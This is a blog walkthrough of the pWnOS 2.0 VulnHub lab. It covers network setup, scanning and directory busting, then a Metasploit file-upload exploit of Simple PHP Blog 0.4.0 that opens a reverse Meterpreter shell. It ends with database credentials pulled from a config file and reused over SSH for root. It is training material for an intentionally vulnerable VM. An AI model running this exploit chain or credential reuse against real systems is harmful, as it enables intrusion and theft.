pWnOS 2.0 || VulnHub Walkthrough


Hello everyone! Welcome to my new video. Today, we're exploring a vulnerable machine called " pWnOS 2.0 ." This machine is part of the pwnOS series and is classified as an easy-level vulnerable VM, making it perfect for beginners.


To get started, head over to the VulnHub website and download the pwnOS 2.0 image. 

If you're new to VulnHub, be sure to check out our VulnHub playlist for helpful videos that will guide you through the download and setup process.

Vulhub: Vulnerable By Design

Vulhub provides a collection of pre-built vulnerable environments. This resource is designed to help you practice penetration testing and vulnerability assessment skills on a variety of systems.


Let's dive in and start our exploration!


Settings Up

Once we've downloaded the image, the next step is setting up the server in VirtualBox. 

The downloaded image is in the form of a 7z Archive file, which can easily be added to VirtualBox. However, a major issue is that DHCP is not enabled , and a static IP address (10.10.10.100) is already set. This can cause various problems that we need to fix.

To resolve these issues, I set the network to use DHCP instead of a static IP


Configure the Network to Use DHCP Instead of a Static IP

Configuring the machine to receive an IP address dynamically ensures it will avoid potential network configuration problems.

1. Start VMware: First, start the VMware application and import the VM. After importing, log in using the provided username and password:

  • Username: root
  • Password: root@ISIntS

2. Check the Current IP Address: Once logged in, check the IP address of the target machine. This confirms that the target IP address is currently set to 10.10.10.100 .

3. Modify the Network Configuration: Since the attacking machine is set up in VirtualBox and the target machine is in VMware, you need to ensure both machines can communicate. 

To achieve this, we need to modify the network configuration of the target machine from a static IP to DHCP. This will allow the target machine to automatically receive an IP address that is compatible with the host-only network.

4. Edit the Network Interfaces Configuration: To change the static IP to DHCP, you need to edit the /etc/network/interfaces file on the target machine. Open this file with a text editor:

5. Update the Network Configuration: In the configuration file, you will see a section that looks like this:

Change it to:

Now, the machine is successfully set up to use DHCP, which will automatically assign a host-only IP address. This configuration will enable the attacking machine in VirtualBox (Kali Linux) and the target machine in VMware to join the same network and communicate effectively.

Import the Machine to VMware and Configure the Network for VirtualBox Access

Now, let’s import the machine to VMware. However, a problem arises if we use VMware since our attacking machine is set up on VirtualBox. 

Do we need to reinstall it on VMware?  

Fortunately, I have a solution. Follow these steps to find out how.

Before we start, make sure you already have VMware installed. If not, visit this blog and follow the steps to install it without any cost.

Understanding VMware: Installation Guide

This comprehensive guide covers the installation process of VMware. Learn how to set up VMware effectively for your virtualization needs, enhancing your system's capabilities and performance.

Since we have the 7z file, we can extract it using WinRAR. After extraction, you'll see several files that resemble the previously used pWnOS 2.0 files on VMware.

To add the virtual machine to VMware Workstation, double-click on the VMware virtual machine file among the several files. This will automatically launch and run the VMware Workstation.

There are various settings left to configure, so we need to power off the machine and launch VMware again. 

As you can see, the " pwnOS 2.0 " vulnerable machine is listed in the VMware Manager.

As I previously mentioned, there is no need to reinstall the attacking machine (Kali Linux) on VMware to access the network. Instead, we can change the network settings to use the VirtualBox host-only adapter.

To do this, click on “ Edit virtual machine settings .” 

In the settings window, click on “ Network Adapter .” Check the box that says “ Replicate physical network connection state .” This ensures that the network connection state of your host machine is replicated in the virtual machine. 

Now, click on the “ Configure Adapters ” button under the " Bridged " option.

In the adapter settings, select only the “ VirtualBox Host-Only Ethernet Adapter ” and uncheck any other adapters. 

This setting will bridge the VMware virtual machine’s network connection through the VirtualBox host-only adapter. 

Click OK to save the settings and close the configuration window.

By following these steps, you ensure that both your Kali Linux machine (in VirtualBox) and the pWnOS 2.0 machine (in VMware) are connected to the same host-only network, enabling them to communicate with each other.

Now, you can start your pWnOS virtual machine and begin your penetration testing tasks! 

Finally, you'll notice that our vulnerable machine is ready, with a login prompt awaiting.

Let's dive into the fun!


Enumeration


Identifying the IP address

The initial step in our attack is enumeration, which involves identifying the IP address of our target machine using NetDiscover. To execute this, open a terminal and run " netdiscover -i " followed by specifying the network interface name, which in this case is " eth1 ."

┌──(kali㉿kali)-[~]
└─$ sudo netdiscover -i eth1

 Currently scanning: 192.168.103.0/16   |   Screen View: Unique Hosts                                                                 
                                                                                                                                      
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                      
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.95.1    0a:00:27:00:00:0e      1      60  Unknown vendor                                                                     
 192.168.95.2    08:00:27:c8:36:c8      1      60  PCS Systemtechnik GmbH                                                             
 192.168.95.27   08:00:27:2f:ef:85      1      60  PCS Systemtechnik GmbH  

From the scan results, we've obtained our target IP address: " 192.168.95.27 ."


Conduct a network scan to identify open ports

Next, we'll conduct a network scan to identify open ports, a crucial step in the enumeration process. This helps us understand the attack surface and strategize targeted attacks. We'll use the popular N map tool for this task. Run:

┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV 192.168.95.27

In this command, 

  • " -sC " is used to perform a script scan using the default set of scripts, 
  • while " -sV " enables version detection, allowing us to identify which versions are running on which port.

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-27 02:32 IST
Nmap scan report for 192.168.95.27
Host is up (0.0027s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.8p1 Debian 1ubuntu3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 85:d3:2b:01:09:42:7b:20:4e:30:03:6d:d1:8f:95:ff (DSA)
|   2048 30:7a:31:9a:1b:b8:17:e7:15:df:89:92:0e:cd:58:28 (RSA)
|_  256 10:12:64:4b:7d:ff:6a:87:37:26:38:b1:44:9f:cf:5e (ECDSA)
80/tcp open  http    Apache httpd 2.2.17 ((Ubuntu))
|_http-server-header: Apache/2.2.17 (Ubuntu)
|_http-title: Welcome to this Site!
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.83 seconds
                                                                                                                                       
┌──(kali㉿kali)-[~]
└─$ 

After completing the network scan, we found two open ports:

  • Port 22/TCP: This port is running a Secure Shell (SSH) service, which is used for remote access. This means that with valid credentials, gaining login access to the server will be straightforward.
  • Port 80/TCP: This port is running a Hypertext Transfer Protocol (HTTP) service, which is used for web traffic. This enables access to web services running on the machine, potentially revealing website content or applications.

With this information, we can proceed to explore these services for potential vulnerabilities. Let's start by enumerating these ports, which may lead us to gain a foothold on the target system.


Enumerate the HTTP service and directory-busting

Now, let's explore the content of the website running on Port 80. To look at the contents ourselves, open a web browser, and navigate to the target’s IP address in the URL bar at the top of the window.

Upon visiting the webpage, I discovered a web application titled "IsintS." Although it's unclear what the application does, the presence of three buttons— Home , Register , and Login —on the left side suggests it is a user login portal for a web application or service.

The prominent navigation buttons indicate that the web page’s primary function involves user account management. It offers access to a " Home " page, likely the application's main hub, along with options for existing users to log in and new users to register.

Since we don’t have a username and password to log in, our next best option is to register for a new account, which could provide useful access or information. 

But, it is not a good idea. Therefore, our priority is to find clues that might help us gain a foothold on the target system.

To further investigate, we should perform directory busting to uncover hidden or hard-to-access directories and pages on the target URL. 

For this task, we'll use the " gobuster " tool with the following command.

┌──(kali㉿kali)-[~]
└─$ gobuster dir -u http://192.168.95.27/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt  

Where, 

  • gobuster dir is used to instruct gobuster to perform directory busting. 
  • -u is used to specify the target URL we want to explore. 
  • -w is used to provide the path to the wordlist containing common directory names to try.

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.95.27/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/blog                 (Status: 301) [Size: 313] [--> http://192.168.95.27/blog/]
/login                (Status: 200) [Size: 1174]
/index                (Status: 200) [Size: 854]
/register             (Status: 200) [Size: 1562]
/includes             (Status: 301) [Size: 317] [--> http://192.168.95.27/includes/]
/info                 (Status: 200) [Size: 49882]
/activate             (Status: 302) [Size: 0] [--> http://10.10.10.100/index.php]
Progress: 87664 / 87665 (100.00%)
===============================================================
Finished
===============================================================
                                                                                                                                       
┌──(kali㉿kali)-[~]
└─$ 

Using a directory-busting tool, we have identified several directories on the website. Among them, the " /blog " directory stands out as potentially suspicious.

Let’s explore this directory to see what it contains. 

Upon visiting the " /blog " directory, we find that it appears to be an internal blog for a company called ISINTS

The header links are likely to lead to the company homepage, contact information, blog statistics, and a login page for restricted content or commenting.

The main content area of the blog includes a welcome message, a calendar suggesting regular updates, a search bar, and possibly a list of recent blog posts. It seems to be a platform for ISINTS to share news and updates with its employees.

Since this information doesn’t immediately reveal any vulnerabilities, we should investigate further. Let’s examine the page source for additional clues. 

To do this, right-click on the page and select " View Page Source ." It is also not providing much information. 

Now, let’s check the website information to gather more details. I initially used Wappalyzer , but it didn’t provide much useful information.

Next, we can find more details by inspecting the website's metadata. 


Inspecting the website's metadata

To do this, locate the padlock icon on the left side of the address bar, which indicates the security status of the website. 

Click on this padlock icon to open a small dialog with basic security information. 

Click on the basic security information as it is secure or not, which will lead us to more detail of Connection information.

At the bottom of this dialog, click on " More Information ."

This action will open the " Page Info " dialog box, where you can access detailed information about the page, including the General , Media , Permissions , and Security tabs .

In the " General " tab, I found a Meta tag named " generator " that reveals the web page is generated by " Simple PHP Blog 0.4.0 ." 

Knowing the specific version of the web application can be very useful for identifying known vulnerabilities.


Identifying known vulnerabilities using Searchsploit

To determine if " Simple PHP Blog 0.4.0 " has any known vulnerabilities, let’s use searchsploit , as older versions of web applications often have publicly documented and exploitable vulnerabilities.

┌──(kali㉿kali)-[~]
└─$ searchsploit Simple PHP blog 0.4.0                                    
------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                        |  Path
------------------------------------------------------------------------------------------------------ ---------------------------------
Simple PHP Blog 0.4 - 'colors.php' Multiple Cross-Site Scripting Vulnerabilities                      | cgi/webapps/26463.txt
Simple PHP Blog 0.4 - 'preview_cgi.php' Multiple Cross-Site Scripting Vulnerabilities                 | cgi/webapps/26461.txt
Simple PHP Blog 0.4 - 'preview_static_cgi.php' Multiple Cross-Site Scripting Vulnerabilities          | cgi/webapps/26462.txt
Simple PHP Blog 0.4.0 - Multiple Remote s                                                             | php/webapps/1191.pl
Simple PHP Blog 0.4.0 - Remote Command Execution (Metasploit)                                         | php/webapps/16883.rb
------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
                                                                                                                                        
┌──(kali㉿kali)-[~]
└─$ 

From the searchsploit results, I identified five potential exploits. However, for this target, I will not use the XSS vulnerability, as it is more suited for initial information gathering and low-risk testing. 

Our goal is to gain full control of the target system, so we need to focus on more impactful vulnerabilities.


Foothold

From the searchsploit results, we see that there is a remote code execution exploit available for " Simple PHP Blog 0.4.0 " that can be performed using the Metasploit Framework (MSF console) .


Exploiting Simple PHP Blog 0.4.0 using Metasploitable Framework

To proceed, search for the MSF console in the Kali Linux menu and launch it. 

The console will take a moment to initialize, and once it's up, you’ll be presented with the MSF shell .

First, search for available modules related to " Simple PHP Blog 0.4.0 " within the MSF console

msf6 > search Simple PHP Blog 0.4.0

Matching Modules
================

   #  Name                                      Disclosure Date  Rank       Check  Description
   -  ----                                      ---------------  ----       -----  -----------
   0  exploit/unix/webapp/sphpblog_file_upload  2005-08-25       excellent  Yes    Simple PHP Blog Remote Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/webapp/sphpblog_file_upload

msf6 > 

Here, we find a relevant module. Select the first search result, which is the file upload vulnerability exploit for Simple PHP Blog

msf6 > use 0
[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/sphpblog_file_upload) >

When we initialize this exploit, it will automatically select a suitable payload for us.  Next, we have to review the available options for the exploit module to understand which parameters need to be configured.  

msf6 exploit(unix/webapp/sphpblog_file_upload) > options 

Module options (exploit/unix/webapp/sphpblog_file_upload):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
    RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasplo
                                       it.html
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   URI      /sphpblog        yes       Sphpblog directory path
   VHOST                     no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
    LHOST  10.0.2.15        yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(unix/webapp/sphpblog_file_upload) >

Here, we have to set the target host (RHOSTS), set the URI (The path to the vulnerable file upload endpoint), and set the local host (L HOST).

msf6 exploit(unix/webapp/sphpblog_file_upload) > set RHOSTS 192.168.95.27
RHOSTS => 192.168.95.27                                                                                                                 
msf6 exploit(unix/webapp/sphpblog_file_upload) > set URI /blog                                                                          
URI => /blog                                                                                                                            
msf6 exploit(unix/webapp/sphpblog_file_upload) > set LHOST 192.168.95.3                                                                 
LHOST => 192.168.95.3                                                                                                                   
msf6 exploit(unix/webapp/sphpblog_file_upload) >

After configuring these settings, run the exploit. 

msf6 exploit(unix/webapp/sphpblog_file_upload) > run                                                                                    
                                                                                                                                        
[*] Started reverse TCP handler on 192.168.95.3:4444                                                                                    
[+] Successfully retrieved hash: $1$weWj5iAZ$NU4CkeZ9jNtcP/qrPC69a/                                                                     
[+] Successfully removed /config/password.txt                                                                                           
[+] Successfully created temporary account.                                                                                             
[+] Successfully logged in as AqtMVI:zr1XW6                                                                                             
[+] Successfully retrieved cookie: u0elenfkmm4vkp8g136ff5ijd2                                                                           
[+] Successfully uploaded OsojrdYAcmtO4Kz0z53k.php                                                                                      
[+] Successfully uploaded zsFx5K3T2fHgn8HxX7bW.php                                                                                      
[+] Successfully reset original password hash.                                                                                          
[+] Successfully removed /images/OsojrdYAcmtO4Kz0z53k.php                                                                               
[*] Calling payload: /images/zsFx5K3T2fHgn8HxX7bW.php                                                                                   
[*] Sending stage (39927 bytes) to 192.168.95.27                                                                                        
[*] Meterpreter session 1 opened (192.168.95.3:4444 -> 192.168.95.27:33063) at 2024-05-27 03:01:56 +0530                                

Metasploit will start a reverse TCP handler on your machine, ready to receive a connection from the target. The exploit will attempt to upload and execute PHP files on the target server, providing you with a remote Meterpreter session.

[+] Successfully removed /images/zsFx5K3T2fHgn8HxX7bW.php                                                                               

meterpreter >

With the Meterpreter session open, you now have command-line access to the target machine, allowing for further post-exploitation activities such as privilege escalation, data extraction, and more.


Post-Exploitation

To interact directly with the target system’s command line, you can use the shell command within Meterpreter. This will give you a more traditional command-line interface. 

meterpreter > shell
Process 2780 created.                                                                                                                   
Channel 0 created.                                                                                                                      
sh: getcwd() failed: No such file or directory                                                                                          
sh: getcwd() failed: No such file or directory                                                                                                                                                                   
     

After running the shell command, the shell is not properly visible or responsive. So, let’s try running a command to verify if they execute correctly. 

This will help confirm that we have a functional shell and that our commands are being processed by the target system.

id                                                                                                                                      
uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Upon running the id command, it provided me detailed of user information. This confirmed that although the shell was functional, it was not displaying correctly. 

To address this issue, I decided to upgrade the shell using Python.

which python                                                                                                                             
sh: getcwd() failed: No such file or directory /usr/bin/python                                                                           
                                                                                                                                                                                                                          
python -c "import pty;pty.spawn('/bin/bash')"                                                                                           
shell-init: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory                     
www-data@web:$ 

Upon examining the output of the id command, I discovered that the user shell was a basic web server shell. 

To stabilize the shell and gain more control, we needed valid credentials.


Locate the Database Credential

Since the web server had a login and registration system, it implied the presence of a database storing user information. My next step was to locate this database.

www-data@web:$ ls -al                                                                                                                   
ls -al                                                                                                                                  
total 0                                                                                                                                 
www-data@web:$ cd ..                                                                                                                     
cd ..                                                                                                                                   
chdir: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory                          
www-data@web:..$ ls -al                                                                                                                 
ls -al                                                                                                                                  
total 356
drwxrwxrwx 10 root     root      4096 May 26 17:32 .
drwxr-xr-x  4 root     root      4096 May  9  2011 ..
-rwxrwxrwx  1 root     root      5952 Dec 28  2004 add.php
-rwxrwxrwx  1 root     root      6183 Dec 27  2004 add_block.php
-rwxrwxrwx  1 root     root      4609 Dec 28  2004 add_cgi.php
-rwxrwxrwx  1 root     root      5781 Jan 18  2005 add_link.php
-rw-rw-rw-  1 root     root      4496 Jan  2  2005 add_static.php
-rwxrwxrwx  1 root     root      1675 Oct 18  2004 add_static_cgi.php
-rwxrwxrwx  1 root     root       403 Nov  8  2004 atom.php
-rwxrwxrwx  1 root     root     10835 Jan  6  2005 categories.php
-rwxrwxrwx  1 root     root      7516 Nov 30  2004 colors.php
-rwxrwxrwx  1 root     root      2519 Nov 30  2004 colors_cgi.php
-rwxrwxrwx  1 root     root      2720 Jan  4  2005 comment_add_cgi.php
-rwxrwxrwx  1 root     root      1778 Oct 18  2004 comment_delete_cgi.php
-rwxrwxrwx  1 root     root     10194 Jan  4  2005 comments.php
drwxrwxrwx  2 www-data www-data  4096 May 26 17:31 config
-rwxrwxrwx  1 root     root      2374 Nov 22  2004 contact.php
-rwxrwxrwx  1 root     root      1560 Jan 18  2005 contact_cgi.php
drwxrwxrwx  3 www-data www-data  4096 May  9  2011 content
-rwxrwxrwx  1 root     root      3039 Oct 18  2004 delete.php
-rwxrwxrwx  1 root     root      3285 Oct 18  2004 delete_static.php
drwxrwxrwx  2 root     root      4096 Jan 18  2005 docs
-rwxrw-rw-  1 root     root      1001 Nov 28  2004 downgrade.php
drwxrwxrwx  2 root     root      4096 Jan 18  2005 flash
-rwxrwxrwx  1 root     root      1201 Sep 20  2004 image_list.php
-rwxrwxrwx  1 root     root      4754 Jan 18  2005 index.php
-rwxrwxrwx  1 root     root      4185 Oct 18  2004 info.php
-rwxrwxrwx  1 root     root      2282 Sep 20  2004 install00.php
-rwxrwxrwx  1 root     root      1530 Sep 20  2004 install01.php
-rwxrwxrwx  1 root     root      2650 Sep 20  2004 install02.php
-rwxrwxrwx  1 root     root      2239 Sep 20  2004 install03.php
-rwxrwxrwx  1 root     root      1558 Sep 20  2004 install03_cgi.php
drwxrwxrwx  3 root     root      4096 Jan 18  2005 interface
drwxrwxrwx 19 root     root      4096 Jan 18  2005 languages
-rwxrw-rw-  1 root     root      2780 Jan  1  2005 languages.php
-rwxrw-rw-  1 root     root      5294 Jan  1  2005 languages_cgi.php
-rwxrwxrwx  1 root     root      1975 Sep 20  2004 login.php
-rwxrwxrwx  1 root     root      1685 Jan 18  2005 login_cgi.php
-rwxrwxrwx  1 root     root      1059 Sep 20  2004 logout.php
-rwxrwxrwx  1 root     root     22803 Nov 29  2004 options.php
-rwxrwxrwx  1 root     root      2358 Oct 18  2004 options_cgi.php
-rwxrwxrwx  1 root     root      7789 Dec 28  2004 preview_cgi.php
-rwxrwxrwx  1 root     root      5984 Dec 27  2004 preview_static_cgi.php
-rwxrwxrwx  1 root     root      2307 Jan  2  2005 rate_cgi.php
-rwxrwxrwx  1 root     root       400 Nov  8  2004 rdf.php
-rwxrwxrwx  1 root     root       908 Sep 20  2004 recompress.php
-rwxrwxrwx  1 root     root       400 Nov  8  2004 rss.php
drwxrwxrwx  2 root     root      4096 May 26 17:15 scripts
-rwxrwxrwx  1 root     root      1348 Sep 20  2004 search.php
-rwxrwxrwx  1 root     root      2025 Sep 20  2004 set_login.php
-rwxrwxrwx  1 root     root      1345 Sep 20  2004 set_login_cgi.php
-rwxrwxrwx  1 root     root     12027 Nov 29  2004 setup.php
-rwxrwxrwx  1 root     root      2886 Nov 29  2004 setup_cgi.php
-rwxrwxrwx  1 root     root      1616 Oct 18  2004 static.php
-rw-rw-rw-  1 root     root      6904 Jan 18  2005 stats.php
drwxrwxrwx  4 root     root      4096 Jan 18  2005 themes
-rwxrwxrwx  1 root     root      3383 Oct 18  2004 themes.php
-rwxrw-rw-  1 root     root      7956 Nov 27  2004 trackback.php
-rw-rw-rw-  1 root     root      1745 Nov 24  2004 trackback_delete_cgi.php
-rwxrw-rw-  1 root     root       922 Jan 18  2005 upgrade.php
-rw-rw-rw-  1 root     root      1489 Jun 17  2004 upload_img.php
-rwxrwxrwx  1 root     root      1929 Oct 18  2004 upload_img_cgi.php
-rwxrwxrwx  1 root     root      9972 Sep 28  2004 upload_img_new.php
www-data@web:..$ cd ..
cd ..
www-data@web:../..$ ls -al
ls -al
total 64
drwxr-xr-x 16 root root  4096 May  7  2011 .
drwxr-xr-x 21 root root  4096 May  7  2011 ..
drwxr-xr-x  2 root root  4096 Apr 21  2011 backups
drwxr-xr-x  8 root root  4096 May  7  2011 cache
drwxrwxrwt  2 root root  4096 May  7  2011 crash
-rw-r--r--  1 root root   177 May  7  2011 index.html
drwxr-xr-x 34 root root  4096 May  7  2011 lib
drwxrwsr-x  2 root staff 4096 Apr 21  2011 local
drwxrwxrwt  4 root root    80 May 26 16:58 lock
drwxr-xr-x 11 root root  4096 May 26 16:58 log
drwxrwsr-x  2 root mail  4096 May  7  2011 mail
-rw-r--r--  1 root root   520 May  7  2011 mysqli_connect.php
drwxr-xr-x  2 root root  4096 May  7  2011 opt
drwxr-xr-x 10 root root   440 May 26 16:59 run
drwxr-xr-x  4 root root  4096 May  7  2011 spool
drwxrwxrwt  2 root root  4096 Apr 21  2011 tmp
drwxr-xr-x  2 root root  4096 May  7  2011 uploads
drwxr-xr-x  4 root root  4096 May  9  2011 www
www-data@web:../..$ 

Upon navigating back through the initial web directories, I discovered a file named mysqli_connect.php , which appeared promising as it likely contained MySQL database credentials .

Let’s open it.

www-data@web:../..$ cat mysqli_connect.php
cat mysqli_connect.php
<?php # Script 8.2 - mysqli_connect.php

// This file contains the database access information.
// This file also establishes a connection to MySQL
// and selects the database.

// Set the database access information as constants:

DEFINE ('DB_USER', ' root ');
DEFINE ('DB_PASSWORD', ' root@ISIntS ');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'ch16');

// Make the connection:

$dbc = @mysqli_connect (DB_HOST, DB_USER, DB_PASSWORD, DB_NAME) OR die ('Could not connect to MySQL: ' . mysqli_connect_error() );

?>www-data@web:../..$ 

Inside mysqli_connect.php, I found the username and password for the database.

  • Username: root
  • Password: root@ISIntS


Access using Secure Shell Service

With this information in hand, let’s utilize the Secure Shell (SSH) service to establish a connection using these credentials. 

┌──(kali㉿kali)-[~]
└─$ ssh [email protected]
The authenticity of host '192.168.95.27 (192.168.95.27)' can't be established.
ECDSA key fingerprint is SHA256:EWPtTr0Xn9NMudUhcD3+AMXSigXAGS4uldZp3grLm8w.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.95.27' (ECDSA) to the list of known hosts.
[email protected]'s password: 

Welcome to Ubuntu 11.04 (GNU/Linux 2.6.38-8-server x86_64)

 * Documentation:  http://www.ubuntu.com/server/doc

  System information as of Sun May 26 17:37:34 EDT 2024

  System load:  0.0               Processes:           81
  Usage of /:   2.9% of 38.64GB   Users logged in:     1
  Memory usage: 13%               IP address for eth0: 192.168.95.27
  Swap usage:   0%

Graph this data and manage this system at https://landscape.canonical.com/

Last login: Sun May 26 16:59:06 2024
root@web:~# 

Fortunately, the connection attempt was successful, granting me a root shell of the system. This meant further escalation was unnecessary.

root@web:~# ls -al
total 32
drwx------  4 root root 4096 2011-05-09 19:25 .
drwxr-xr-x 21 root root 4096 2011-05-07 13:37 ..
drwx------  2 root root 4096 2011-05-07 15:12 .aptitude
-rw-r--r--  1 root root  107 2011-05-09 19:29 .bash_history
-rw-r--r--  1 root root 3106 2010-10-21 08:47 .bashrc
drwx------  2 root root 4096 2011-05-07 17:18 .cache
-rw-r--r--  1 root root    0 2011-05-09 19:24 .mysql_history
-rw-r--r--  1 root root  140 2010-10-21 08:47 .profile
-rw-------  1 root root  837 2011-05-09 19:16 .viminfo
root@web:~#

Upon thoroughly examining the files and directories, I did not come across any flags. This indicates that the pWnOS vulnerable machine does not contain any flags to discover.

If you have any questions or uncertainties regarding the steps outlined in this video, please feel free to ask in the comments section below.

Tags

Post a Comment

0 Comments
* Please Don't Spam Here. All the Comments are Reviewed by Admin.

#buttons=(Ok, Go it!) #days=(20)

Our website uses cookies to enhance your experience. Learn More
Ok, Go it!